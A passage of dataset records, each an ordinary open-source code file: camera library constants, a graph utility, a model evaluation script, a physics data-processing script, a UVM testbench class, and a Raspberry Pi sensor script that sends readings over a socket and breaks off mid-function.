\"RenderGroundTruth\"\nITM_RENDER_POINT_MAP = \"RenderPointMap\"\nITM_RENDER_POINT_MAP_TEXTURE = \"RenderPointMapTexture\"\nITM_RENDER_VIEW = \"RenderView\"\nITM_REPROJECTION = \"Reprojection\"\nITM_REPROJECTION_ERROR = \"ReprojectionError\"\nITM_REPROJECTION_ERROR_SCALE = \"ReprojectionErrorScale\"\nITM_RESET_CLOCK = \"ResetClock\"\nITM_RESIDUAL = \"Residual\"\nITM_RESTART_DAEMON = \"RestartDaemon\"\nITM_RESULT = \"Result\"\nITM_RETRIEVED = \"Retrieved\"\nITM_RETURN_ALL_PATTERN = \"ReturnAllPattern\"\nITM_REVERSE_PATH_FILTERING = \"ReversePathFiltering\"\nITM_RIGHT = \"Right\"\nITM_RIGHT_BOTTOM = \"RightBottom\"\nITM_RIGHT_TOP = \"RightTop\"\nITM_ROTATE = \"Rotate\"\nITM_ROTATION = \"Rotation\"\nITM_RUNNING = \"Running\"\nITM_RX = \"Rx\"\nITM_RY = \"Ry\"\nITM_SCALED_AREA_OF_INTEREST = \"ScaledAreaOfInterest\"\nITM_SCALED_MEASUREMENT_VOLUME = \"ScaledMeasurementVolume\"\nITM_SCALED_MINIMUM_DISPARITY = \"ScaledMinimumDisparity\"\nITM_SCALED_NUMBER_OF_DISPARITIES = \"ScaledNumberOfDisparities\"\nITM_SCALING = \"Scaling\"\nITM_SCORE = \"Score\"\nITM_SENSOR = \"Sensor\"\nITM_SENSORS = \"Sensors\"\nITM_SERIAL_NUMBER = \"SerialNumber\"\nITM_SETUP = \"Setup\"\nITM_SHADOWING_THRESHOLD = \"ShadowingThreshold\"\nITM_SHININESS = \"Shininess\"\nITM_SHOW_CAMERAS = \"ShowCameras\"\nITM_SHOW_GRID = \"ShowGrid\"\nITM_SHOW_OBJECT_POINTS = \"ShowObjectPoints\"\nITM_SHOW_PATTERN = \"ShowPattern\"\nITM_SHOW_PATTERN_POINTS = \"ShowPatternPoints\"\nITM_SHOW_PATTERNS = \"ShowPatterns\"\nITM_SHOW_RECTIFIED_AREA = \"ShowRectifiedArea\"\nITM_SHOW_SURFACE = \"ShowSurface\"\nITM_SHOW_USER_DEFINED_MODELS = \"ShowUserDefinedModels\"\nITM_SINK = \"Sink\"\nITM_SIZE = \"Size\"\nITM_SKEW = \"Skew\"\nITM_SOURCE = \"Source\"\nITM_SPECKLE_REMOVAL = \"SpeckleRemoval\"\nITM_SPECULAR = \"Specular\"\nITM_SPLIT_ROTATION = \"SplitRotation\"\nITM_START_DAEMON = \"StartDaemon\"\nITM_STATIC_BUFFER_COUNT = \"StaticBufferCount\"\nITM_STATIC_BUFFERS = \"StaticBuffers\"\nITM_STATUS = \"Status\"\nITM_STEREO = \"Stereo\"\nITM_STEREO_CALIBRATION = \"StereoCalibration\"\nITM_STEREO_CALIBRATION_ONLY = \"StereoCalibrationOnly\"\nITM_STEREO_EXTRINSIC = \"StereoExtrinsic\"\nITM_STEREO_INTRINSIC = \"StereoIntrinsic\"\nITM_STEREO_MATCHING = \"StereoMatching\"\nITM_STEREO_PATTERN_COUNT = \"StereoPatternCount\"\nITM_STOP_DAEMON = \"StopDaemon\"\nITM_SUBSAMPLING = \"Subsampling\"\nITM_SUBSET = \"Subset\"\nITM_SURFACE_CONNECTIVITY = \"SurfaceConnectivity\"\nITM_SYMBOL = \"Symbol\"\nITM_SYSTEM_INFO = \"SystemInfo\"\nITM_T1 = \"T1\"\nITM_T2 = \"T2\"\nITM_TARGET = \"Target\"\nITM_TARGET_BRIGHTNESS = \"TargetBrightness\"\nITM_TEMPERATURE = \"Temperature\"\nITM_TEMPORARY = \"Temporary\"\nITM_TEXT = \"Text\"\nITM_TEXTURE = \"Texture\"\nITM_THICKNESS = \"Thickness\"\nITM_THREADS = \"Threads\"\nITM_TILT_DIRECTION = \"TiltDirection\"\nITM_TIME = \"Time\"\nITM_TIME_EXECUTE = \"TimeExecute\"\nITM_TIME_FINALIZE = \"TimeFinalize\"\nITM_TIME_PREPARE = \"TimePrepare\"\nITM_TIMEOUT = \"Timeout\"\nITM_TIMESTAMP = \"Timestamp\"\nITM_TOLERANCE = \"Tolerance\"\nITM_TOP = \"Top\"\nITM_TRANSFORMATION = \"Transformation\"\nITM_TRANSFORMATIONS = \"Transformations\"\nITM_TRANSLATION = \"Translation\"\nITM_TRANSPORT_LAYER = \"TransportLayer\"\nITM_TRIGGER_DELAY = \"TriggerDelay\"\nITM_TRIGGER_MODE = \"TriggerMode\"\nITM_TRIGGERED = \"Triggered\"\nITM_TYPE = \"Type\"\nITM_U_EYE = \"UEye\"\nITM_USB = \"USB\"\nITM_UNIQUE_NAME = \"UniqueName\"\nITM_UNIQUENESS_OFFSET = \"UniquenessOffset\"\nITM_UNIQUENESS_RATIO = \"UniquenessRatio\"\nITM_UPDATE_GLOBAL_PATTERN_DATA = \"UpdateGlobalPatternData\"\nITM_UPDATER = \"Updater\"\nITM_URL = \"Url\"\nITM_USE_BUFFERED_PATTERNS = \"UseBufferedPatterns\"\nITM_USE_DISPARITY_MAP_AREA_OF_INTEREST = \"UseDisparityMapAreaOfInterest\"\nITM_USE_FLOAT16 = \"UseFloat16\"\nITM_USE_MODEL = \"UseModel\"\nITM_USE_OPEN_GL = \"UseOpenGL\"\nITM_USE_RECALIBRATOR = \"UseRecalibrator\"\nITM_USE_STEREO_TEXTURES = \"UseStereoTextures\"\nITM_USER = \"User\"\nITM_VALID_FIRMWARE = \"ValidFirmware\"\nITM_VALID_IP_ADDRESS = \"ValidIpAddress\"\nITM_VALID_REGION = \"ValidRegion\"\nITM_VALUE = \"Value\"\nITM_VALUES = \"Values\"\nITM_VERGENCE = \"Vergence\"\nITM_VERSION = \"Version\"\nITM_VERTICAL = \"Vertical\"\nITM_VIEW_POSE = \"ViewPose\"\nITM_VIGNETTING = \"Vignetting\"\nITM_WAIT_FOR = \"WaitFor\"\nITM_WAIT_FOR_PROJECTOR = \"WaitForProjector\"\nITM_WAIT_FOR_RECALIBRATION = \"WaitForRecalibration\"\nITM_WIDTH = \"Width\"\nITM_WIRING_TEST = \"WiringTest\"\nITM_WITH_OVERLAY = \"WithOverlay\"\nITM_WORLD_COORDINATES = \"WorldCoordinates\"\nITM_WRITE_FREQUENCY = \"WriteFrequency\"\nITM_YEAR = \"Year\"\nITM_YELLOW = \"Yellow\"\nITM_Z_BUFFER_ONLY = \"ZBufferOnly\"\nVAL_ADD = \"Add\"\nVAL_ALIGNED = \"Aligned\"\nVAL_ALIGNED_AND_DIAGONAL = \"AlignedAndDiagonal\"\nVAL_ALL = \"All\"\nVAL_ALLOW = \"Allow\"\nVAL_ARRAY = \"Array\"\nVAL_ASSEMBLY = \"Assembly\"\nVAL_AUTO = \"Auto\"\nVAL_AVAILABLE = \"Available\"\nVAL_AXIS = \"Axis\"\nVAL_BINARY = \"Binary\"\nVAL_BLOCK_MATCHING = \"BlockMatching\"\nVAL_BOOLEAN = \"Boolean\"\nVAL_BOTTOM = \"Bottom\"\nVAL_BOX = \"Box\"\nVAL_BUFFER = \"Buffer\"\nVAL_CONSOLE = \"Console\"\nVAL_CONTINUOUS = \"Continuous\"\nVAL_CORRELATION = \"Correlation\"\nVAL_CUBE = \"Cube\"\nVAL_CUBOID = \"Cuboid\"\nVAL_CYLINDER = \"Cylinder\"\nVAL_DHCP = \"DHCP\"\nVAL_DEBUG = \"Debug\"\nVAL_DEBUG_OUT = \"DebugOut\"\nVAL_DELAYED = \"Delayed\"\nVAL_DIAGONAL = \"Diagonal\"\nVAL_DISCARD_NEW = \"DiscardNew\"\nVAL_DISCARD_OLD = \"DiscardOld\"\nVAL_DOWN = \"Down\"\nVAL_ENSENSO = \"Ensenso\"\nVAL_ETHERNET = \"Ethernet\"\nVAL_EUCLIDEAN = \"Euclidean\"\nVAL_FALLING_EDGE = \"FallingEdge\"\nVAL_FILE = \"File\"\nVAL_FIXED = \"Fixed\"\nVAL_FLEX_VIEW2 = \"FlexView2\"\nVAL_FLEXIBLE = \"Flexible\"\nVAL_FLOAT = \"Float\"\nVAL_FORCE = \"Force\"\nVAL_GRID_HEIGHT = \"GridHeight\"\nVAL_GRID_SPACING = \"GridSpacing\"\nVAL_GRID_WIDTH = \"GridWidth\"\nVAL_HALCON = \"Halcon\"\nVAL_HAND = \"Hand\"\nVAL_HIDDEN = \"Hidden\"\nVAL_HIGH = \"High\"\nVAL_HIGH_ACTIVE = \"HighActive\"\nVAL_IMAGE_POSITION = \"ImagePosition\"\nVAL_IMMEDIATE = \"Immediate\"\nVAL_IN_USE = \"InUse\"\nVAL_INDEX = \"Index\"\nVAL_INFO = \"Info\"\nVAL_ITEM = \"Item\"\nVAL_LEFT = \"Left\"\nVAL_LEFT_TO_RIGHT = \"LeftToRight\"\nVAL_LINK = \"Link\"\nVAL_LINK_HIDDEN = \"LinkHidden\"\nVAL_LOCKED = \"Locked\"\nVAL_LOW = \"Low\"\nVAL_LOW_ACTIVE = \"LowActive\"\nVAL_MASK = \"Mask\"\nVAL_MONOCULAR = \"Monocular\"\nVAL_MOVING = \"Moving\"\nVAL_NETWORK_TYPE_A = \"NetworkTypeA\"\nVAL_NETWORK_TYPE_B = \"NetworkTypeB\"\nVAL_NETWORK_TYPE_C = \"NetworkTypeC\"\nVAL_NEW = \"New\"\nVAL_NONE = \"None\"\nVAL_NOT_SPECIFIED = \"NotSpecified\"\nVAL_NULL = \"Null\"\nVAL_NUMBER = \"Number\"\nVAL_OBJECT = \"Object\"\nVAL_OFF = \"Off\"\nVAL_OPEN = \"Open\"\nVAL_ORIGIN = \"Origin\"\nVAL_PWM = \"PWM\"\nVAL_PATTERN = \"Pattern\"\nVAL_PERSISTENT = \"Persistent\"\nVAL_PLANE = \"Plane\"\nVAL_PROJECTOR = \"Projector\"\nVAL_RANDOM = \"Random\"\nVAL_RAW = \"Raw\"\nVAL_RECTIFIED = \"Rectified\"\nVAL_REPROJECTION_ERROR = \"ReprojectionError\"\nVAL_RIGHT = \"Right\"\nVAL_RIGHT_TO_LEFT = \"RightToLeft\"\nVAL_RISING_EDGE = \"RisingEdge\"\nVAL_SERIAL_NUMBER = \"SerialNumber\"\nVAL_SGM_ALIGNED = \"SgmAligned\"\nVAL_SGM_ALIGNED_AND_DIAGONAL = \"SgmAlignedAndDiagonal\"\nVAL_SGM_DIAGONAL = \"SgmDiagonal\"\nVAL_SINGLE = \"Single\"\nVAL_SINGLE_CUSTOM = \"SingleCustom\"\nVAL_SOFTWARE = \"Software\"\nVAL_SPHERE = \"Sphere\"\nVAL_STANDARD = \"Standard\"\nVAL_STATIC = \"Static\"\nVAL_STEREO = \"Stereo\"\nVAL_STRING = \"String\"\nVAL_STRUCTURE_LOCKED = \"StructureLocked\"\nVAL_SUCCESSFUL = \"Successful\"\nVAL_T_PIECE = \"TPiece\"\nVAL_TILT_DIRECTION = \"TiltDirection\"\nVAL_TOP = \"Top\"\nVAL_TRACE = \"Trace\"\nVAL_TRIGGERED = \"Triggered\"\nVAL_TYPE = \"Type\"\nVAL_USB = \"USB\"\nVAL_UNKNOWN = \"Unknown\"\nVAL_UNTRIGGERED = \"Untriggered\"\nVAL_UP = \"Up\"\nVAL_VALIDATE = \"Validate\"\nVAL_VIRTUAL = \"Virtual\"\nVAL_WORKSPACE = \"Workspace\"\nVAL_X = \"X\"\nVAL_XYZ = \"XYZ\"\nVAL_Y = \"Y\"\nVAL_Z = \"Z\"\nVAL_ZYX = \"ZYX\"\n\nCONSTANTS_PREFIX = {'Commands': 'cmd', 'Errors': 'err', 'Items': 'itm',\n 'Values': 'val', 'ApiErrors': 'NxLib', 'ItemTypes': 'NxLib'}\n\nGET_CONSTANTS_CMD = \"GetConstants\"\n\n\ndef _update_constants_module():\n try:\n cmd = _NxLibCommand(GET_CONSTANTS_CMD)\n cmd.execute()\n result = cmd.result()\n\n itm = result.as_json()\n json_object = json.loads(itm)\n\n for constant_type in json_object:\n if (isinstance(json_object[constant_type], list)):\n prefix = CONSTANTS_PREFIX[constant_type]\n for constant in json_object[constant_type]:\n variable_name = None\n value = None\n if isinstance(constant, dict):\n variable_name = prefix + constant['Name']\n value = constant['Value']\n else:\n variable_name = prefix + constant\n value = str(constant)\n variable_name = _convert_camel_to_upper_snake(variable_name)\n if variable_name.startswith('NX_LIB'):\n variable_name = _fix_nxlib_prefix(variable_name)\n globals()[variable_name] = value\n except:\n raise _NxLibError(\"Could not load current ensenso_nxlib constants. \"\n \"It may be that your ensenso_nxlib version does not support updating.\")\n\n\ntry:\n _update_constants_module()\nexcept _NxLibError:\n pass\nexcept:\n pass\n","sub_path":"ensenso_nxlib/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":25745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508818709","text":"'''Copyright (c) 2014, The Regents of the University of Michigan\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n# this file contains one function that maybe useful for distributed controller \n# design\n'''\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# The function takes in a DiGraph, and returns a tuple\n# the first element of this tuple would be the condensation\n# DiGraph, and the second element is a list of subgraphs\n# corresponding to the node in the condensation Digraph C\ndef condensation_plus(G):\n\tC = nx.condensation(G)\n\tmaps = {}\n\tmaps = C.graph['mapping']\n\n\tnum_of_c = C.number_of_nodes();\n\tnbunch = {}\n\tfor num in range(0,num_of_c):\n\t\tnbunch[num] = []\n\n\t#search through and divide G.nodes() into groups\n\tfor num in range(0,num_of_c):\n\t\tfor name in G.nodes():\n\t\t\tif maps[name]==num:\n\t\t\t\tnbunch[num].append(name)\n\n\tG_sub = {};\n\n\tfor i in range(0, num_of_c):\n\t\tG_sub[i] = G.subgraph(nbunch[i])\n\n\tresult = [];\n\tresult.append(C);\n\tresult.append(G_sub);\n\n\treturn result\n\n","sub_path":"condensation_plus.py","file_name":"condensation_plus.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538893389","text":"# from sklearn.metrics import precision_recall_fscore_support\nfrom network import Unet\nfrom dataset import DUTSdataset\nimport torch\nimport os\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom tensorboardX import SummaryWriter\n\nimport argparse\nfrom sklearn.metrics import precision_recall_curve\n\ntorch.set_printoptions(profile='full')\nif __name__ == '__main__':\n\n models = sorted(os.listdir('models/state_dict/10151622'), key=lambda x: int(x.split('epo_')[1].split('step')[0]))\n duts_dataset = DUTSdataset(root_dir='../DUTS-TE', train=False)\n dataloader = DataLoader(duts_dataset, 8, shuffle=True)\n beta_square = 0.3\n device = torch.device(\"cuda\")\n writer = SummaryWriter('log/F_Measure/10151622_adjusted')\n model = Unet().to(device)\n for model_name in models:\n if int(model_name.split('epo_')[1].split('step')[0]) % 1000 != 0:\n continue\n\n state_dict = torch.load('models/state_dict/10151622/' + model_name)\n model.load_state_dict(state_dict)\n model.eval()\n mae = 0\n preds = []\n masks = []\n for i, batch in enumerate(dataloader):\n img = batch['image'].to(device)\n mask = batch['mask'].to(device)\n with torch.no_grad():\n pred, loss = model(img, mask)\n pred = pred[5].data\n mae += torch.mean(torch.abs(pred - mask))\n pred = pred.requires_grad_(False)\n preds.append(pred)\n masks.append(mask)\n pred = torch.cat(preds, 0)\n mask = torch.cat(masks, 0)\n writer.add_pr_curve('PR_curve', mask, pred, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar('MAE', torch.mean(torch.abs(pred - mask)), global_step=int(model_name.split('epo_')[1].split('step')[0]))\n # Measure method from https://github.com/AceCoooool/DSS-pytorch solver.py\n pred = pred.cpu()\n mask = mask.round().float().cpu()\n prec, recall = torch.zeros(256), torch.zeros(256)\n thlist = torch.linspace(0, 1 - 1e-10, 256)\n for i in range(256):\n y_temp = (pred >= thlist[i]).float()\n tp = (y_temp * mask).sum()\n # avoid prec becomes 0\n prec[i], recall[i] = (tp + 1e-10) / (y_temp.sum() + 1e-10), (tp + 1e-10) / (mask.sum() + 1e-10)\n f_score = (1 + beta_square) * prec * recall / (beta_square * prec + recall)\n print(torch.max(f_score))\n writer.add_scalar(\"Max F_score\", torch.max(f_score), global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar(\"Max_F_threshold\", thlist[torch.argmax(f_score)], global_step=int(model_name.split('epo_')[1].split('step')[0]))\n print(model_name.split('epo_')[1].split('step')[0])\n \"\"\"\n for edge in range(100):\n threshold = edge/100.0\n avg_precision, avg_recall, avg_fscore = [], [], []\n tp, tn, fp, fn, = 0, 0, 0, 0\n for i, batch in enumerate(dataloader):\n img = batch['image'].to(device)\n mask = batch['mask'].to(device)\n with torch.no_grad():\n pred, loss = model(img, mask)\n pred = pred[5].data\n writer.add_pr_curve('1234', mask, pred)\n mae += F.mse_loss(pred, mask)\n pred = pred.requires_grad_(False)\n pred = torch.round(pred + threshold - 0.5).data\n t = mask.type(torch.cuda.FloatTensor)\n p = pred.type(torch.cuda.FloatTensor)\n f = 1 - mask.type(torch.cuda.FloatTensor)\n n = 1 - pred.type(torch.cuda.FloatTensor)\n # based on http://blog.acronym.co.kr/556\n tp += float(torch.sum(t * p))\n tn += float(torch.sum(f * n))\n fp += float(torch.sum(f * p))\n fn += float(torch.sum(t * n))\n if i % 100 == 0 and i > 0:\n print('Model: '+model_name)\n print('i: ', i)\n print('tp: '+str(tp))\n print('tn: '+str(tn))\n print('fp: '+str(fp))\n print('fn: '+str(fn))\n break\n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n fscore = (1 + beta_square) * precision * recall / (beta_square * precision + recall)\n writer.add_scalar('precision', precision, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar('recall', recall, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar('F_score', fscore, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n print('Model : ' + model_name)\n print('Threshold : '+str(threshold))\n print('Precision : ' + str(precision))\n print('Recall : ' + str(recall))\n print('F_score : ' + str(fscore))\n print('MAE:' + str(mae / 10000))\n writer.add_scalar('MAE', mae / 10000, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n \"\"\"","sub_path":"pytorch/measure_test.py","file_name":"measure_test.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97223434","text":"# -- coding: utf-8 --\nimport sys\nimport multiprocessing\nfrom multiprocessing import shared_memory\nimport constant as const\nfrom matplotlib import colors, ticker, cm\nfrom numpy import ma\nimport time\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport sdf\nimport matplotlib\nimport math\nmatplotlib.use('agg')\n\nsavedir = const.txtdir # \"./txt/a0_1_2e-2/\"\nsavename = \"XtMatr.npy\"\nfftdir = const.figdir # \"./fig/a0_1_2e-2/\"\n###\ndirsdf = const.sdfdir # '../Data/a0_1_2e-2/'\ndirsize = const.filenumber # 4\n\ndelta_x = const.delta_x\ndelta_y = const.delta_y\nx_interval = 10\ny_interval = 1\nfor i in range(10000):\n if i * delta_x < 1e-6:\n x_interval = i\n if i * delta_y < 1e-6:\n y_interval = i\nprint(x_interval,y_interval)\n\n\nxStartDistance = 1000 #sys.argv[2]\nxStart = int(float(xStartDistance)/const.delta_x/x_interval)\nxEnd = int(max((xStart + const.Nx/x_interval) , const.stop/x_interval))\nXarr = const.delta_x * x_interval * np.arange(xStart,xEnd+2)\nprint('Xarr.shape',Xarr.shape)\nprint('start end',xStart , xEnd)\ndef extract(n):\n #### header data ####\n print('n:'+str(n))\n # xt = np.frombuffer(global_arr_shared, np.double).reshape(SHAPE)\n xt = np.ndarray(ss1, dtype=ss2, buffer=shm.buf) # xt[X,T,Y]\n data = sdf.read(dirsdf+str(n).zfill(dirsize)+\".sdf\", dict=True)\n header = data['Header']\n time = header['time']\n # E_y0=data['Electric Field/Ey'].data[:,int(y)]\n #E = data['Electric Field/Ey'].data[:,::int(y_interval)]\n E = data['Magnetic Field/Bz'].data[:,::int(y_interval)]\n if n < start_move_number:\n for x in range(xStart,xEnd+1):\n a=int(x*x_interval)\n d_n=int((1e15*delta_x*a/c)/dt)\n if n-d_n > 0 and n-d_n < t_size :# [fs]\n xt[x-xStart,n-d_n,:]=E[a-1,:] #/bxunit \n else:\n # for x in range(1,int(xgrid/x_interval)+1):\n for x in range(xStart,xEnd+1):\n a=int(x*x_interval)\n if a-c*(time-window_start_time)/delta_x >= 0 and a-c*(time-window_start_time)/delta_x < gridnumber-1:\n # [fs]\n d_n=int((1e15*delta_x*a/c)/dt)\n xt[x-xStart,n-d_n,:]=E[int(round(a-c*(time-window_start_time)/delta_x)),:] #/bxunit\n return \"OK\"+str(n)\n # else:bz.append(0)\n # print 'Reading finished%d' %len(t)\nif __name__ == \"__main__\":\n ######## Constant defined here ########\n pi = 3.1415926535897932384626\n q0 = 1.602176565e-19 # C\n m0 = 9.10938291e-31 # kg\n v0 = 2.99792458e8 # m/s^2\n kb = 1.3806488e-23 # J/K\n mu0 = 4.0e-7*pi # N/A^2\n epsilon0 = 8.8541878176203899e-12 # F/m\n h_planck = 6.62606957e-34 # J s\n # lamada\n\n\n wavelength= const.lamada #10.6e-6\n\n ####\n\n frequency = v0*2*pi/wavelength\n micron = 1e-6\n c = 3e8\n exunit = m0*v0*frequency/q0\n bxunit = m0*frequency/q0\n denunit = frequency**2*epsilon0*m0/q0**2\n print('electric field unit: '+str(exunit))\n print('magnetic field unit: '+str(bxunit))\n print('density unit nc: '+str(denunit))\n font = {'family' : 'monospace', \n 'color' : 'black', \n 'weight' : 'normal', \n 'size' : 28, \n } \n if (os.path.isdir(savedir) == False):\n os.mkdir(savedir)\n \n if (os.path.isdir(fftdir) == False):\n os.mkdir(fftdir) \n ######### Script code drawing figure ################\n # constant\n ###\n c = 3e8\n micron = 1e-6\n lamada = const.lamada #10.6 * micron\n gridnumber = const.Nx #2400\n start = 1\n stop = const.stop #5889 #17000\n step = 1\n dt_snapshot= const.dt_snapshot #1e-15\n dt = dt_snapshot*1e15 #fs\n x_max = const.x_max #80 * lamada #60 * lamada #micron\n x_min = 0 * micron\n x_end = x_max - x_min\n y = const.Ny/2 \n window_start_time = (x_max - x_min) / c\n # start_move_number = window_start_time * 1e15 #fs\n start_move_number = int(window_start_time / dt_snapshot)\n delta_x = x_end/gridnumber\n t_end = stop * dt_snapshot\n #x_interval=const.x_interval #10\n t_total=1e15*x_end/c #fs\n t_size=t_total/(dt_snapshot*1e15)+1 #t_grid_number\n if t_end-window_start_time<0:\n xgrid = int(gridnumber)\n else: \n xgrid = int(gridnumber + c*(t_end-window_start_time)/delta_x)\n\n####################\n #x_interval= const.x_interval #10\n t_total=1e15*x_end/c #fs\n t_size=int(t_total/dt)+1+1 \n\n# allay define\n SHAPE = ((int(xgrid/x_interval)+1,t_size))\n\n # xRange = int(xgrid/x_interval + 1)\n xRange = int(xEnd - xStart)\n tRange = t_size\n # xStart = c * (tStart-start_move_number) * const.dt_snapshot / const.delta_x\n # xEnd = c * (tStart-start_move_number) *const.dt_snapshot / const.delta_x + const.Nx\n\n tStart = float(xStartDistance)/c/const.dt_snapshot #xStart*x_interval * const.delta_x / const.dt_snapshot / c # + start_move_number - const.Nx*const.delta_x/c/const.dt_snapshot\n tEnd = tStart + const.delta_x * const.Nx/c/const.dt_snapshot\n print('tStart,tEnd',tStart,tEnd)\n tEnd = min(tEnd,const.stop)\n print(xRange,tRange,const.Ny)\n a = np.zeros((xRange+2,tRange+2,int((const.Ny-1)/y_interval+1)))\n print('a.shape',a.shape)\n print(xRange,tRange,const.Ny)\n shm = shared_memory.SharedMemory(create=True, size=a.nbytes)\n\n ss1,ss2=a.shape,a.dtype\n pool = multiprocessing.Pool(processes=96,initargs=(ss1,ss2))\n print('range:',np.arange(int(tStart),int(tEnd)))\n results = pool.map(extract,np.arange(int(tStart),int(tEnd)))\n pool.close()\n pool.join()\n xt = np.ndarray(a.shape, dtype=a.dtype, buffer=shm.buf)\n np.save(savedir+savename, xt)\n np.save(savedir + 'Xarr.npy',Xarr)\n shm.close()\n shm.unlink()\n print('XtMatr saved')\n Xf = np.fft.rfft(xt,axis=1)\n np.save(savedir + str(x_interval)+'_'+str(y_interval) +'XfMatr.npy',Xf)\n print('XfMatr saved')\n","sub_path":"te.py","file_name":"te.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"180258578","text":"#//----------------------------------------------------------------------\n#// Copyright 2007-2010 Mentor Graphics Corporation\n#// Copyright 2007-2011 Cadence Design Systems, Inc.\n#// Copyright 2010-2011 Synopsys, Inc.\n#// Copyright 2019-2020 Tuomas Poikela (tpoikela)\n#// All Rights Reserved Worldwide\n#//\n#// Licensed under the Apache License, Version 2.0 (the\n#// \"License\"); you may not use this file except in\n#// compliance with the License. You may obtain a copy of\n#// the License at\n#//\n#// http://www.apache.org/licenses/LICENSE-2.0\n#//\n#// Unless required by applicable law or agreed to in\n#// writing, software distributed under the License is\n#// distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n#// CONDITIONS OF ANY KIND, either express or implied. See\n#// the License for the specific language governing\n#// permissions and limitations under the License.\n#//----------------------------------------------------------------------\n\n\nfrom uvm import (UVMComponent, UVMConfigDb, sv, uvm_error)\nfrom classC import ClassC\n\n\nclass ClassB(UVMComponent):\n\n\n def __init__(self, name, parent):\n super().__init__(name, parent)\n self.debug = 0 # type: int\n self.u1 = None # type: ClassC\n\n def build_phase(self, phase):\n super().build_phase(phase)\n\n _str = []\n if UVMConfigDb.get(self, \"\", \"debug\", _str):\n self.debug = _str[0]\n else:\n uvm_error(\"NO_CONF_MATCH\", \"Did not get debug\")\n UVMConfigDb.set(self, \"u1\", \"v\", 0)\n\n sv.display(\"%s: In Build: debug = %0d\", self.get_full_name(), self.debug)\n\n self.u1 = ClassC(\"u1\", self)\n\n\n def get_type_name(self):\n return \"B\"\n\n def do_print(self, printer):\n printer.print_field(\"debug\", self.debug, 1)\n","sub_path":"test/examples/simple/configuration/manual/classB.py","file_name":"classB.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"25737783","text":"from GPIO_ClassLib import DCMOTOR\nfrom GPIO_ClassLib import TempHumi\nfrom GPIO_ClassLib import Light\nfrom GPIO_ClassLib import SPI\nfrom GPIO_ClassLib import PIR\nfrom multiprocessing import Process,Queue\nimport sys\nimport spidev\nimport time\nimport sqlite3\nimport socket\n\nserver_ip='70.12.107.173'\nserver_port=8282\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndc_pin=(4,25,12)\n\ndc= DCMOTOR(dc_pin,'out')\n\npir=PIR(24,'in')\n\n\ndef ProcessSensors(loop,q):\n th= TempHumi()\n light= Light()\n spi=SPI()\n \n list_temp=[]\n list_humi=[]\n list_light=[]\n list_cds=[]\n list_vr=[]\n \n while loop:\n th.measure_tmp()\n list_temp.append(\"Temp\")\n list_temp.append(th.measure_tmp())\n q.put(list_temp)\n \n th.measure_humi()\n list_humi.append(\"Humi\")\n list_humi.append(th.measure_humi())\n q.put(list_humi)\n time.sleep(1)\n \n light.readLight()\n list_light.append(\"Ligt\")\n list_light.append(light.readLight())\n q.put(list_light)\n time.sleep(1)\n \n spi.printcds()\n list_cds.append(\"Cds \")\n list_cds.append(spi.printcds())\n q.put(list_cds)\n time.sleep(1)\n \n spi.printvr()\n list_vr.append(\"Vr \")\n list_vr.append(spi.printvr())\n q.put(list_vr)\n time.sleep(1)\n \n list_temp=[]\n list_humi=[]\n list_light=[]\n list_cds=[]\n list_vr=[]\n time.sleep(5)\n \n\ndef ProcessPir(loop,q):\n list_pir=[]\n while loop:\n pir.PIR_motionDetection()\n if(pir.PIR_motionDetection()==True):\n list_pir.append(\"Pir\")\n list_pir.append(\"motion dectect\")\n q.put(list_pir)\n else:\n list_pir.append(\"Pir\")\n list_pir.append(\"motion not dectect\")\n q.put(list_pir)\n time.sleep(0.5)\n\ndef ProcessData(loop,q):\n global sock\n client_id='100'\n command='s'\n send_data=''\n data_len='10'\n while 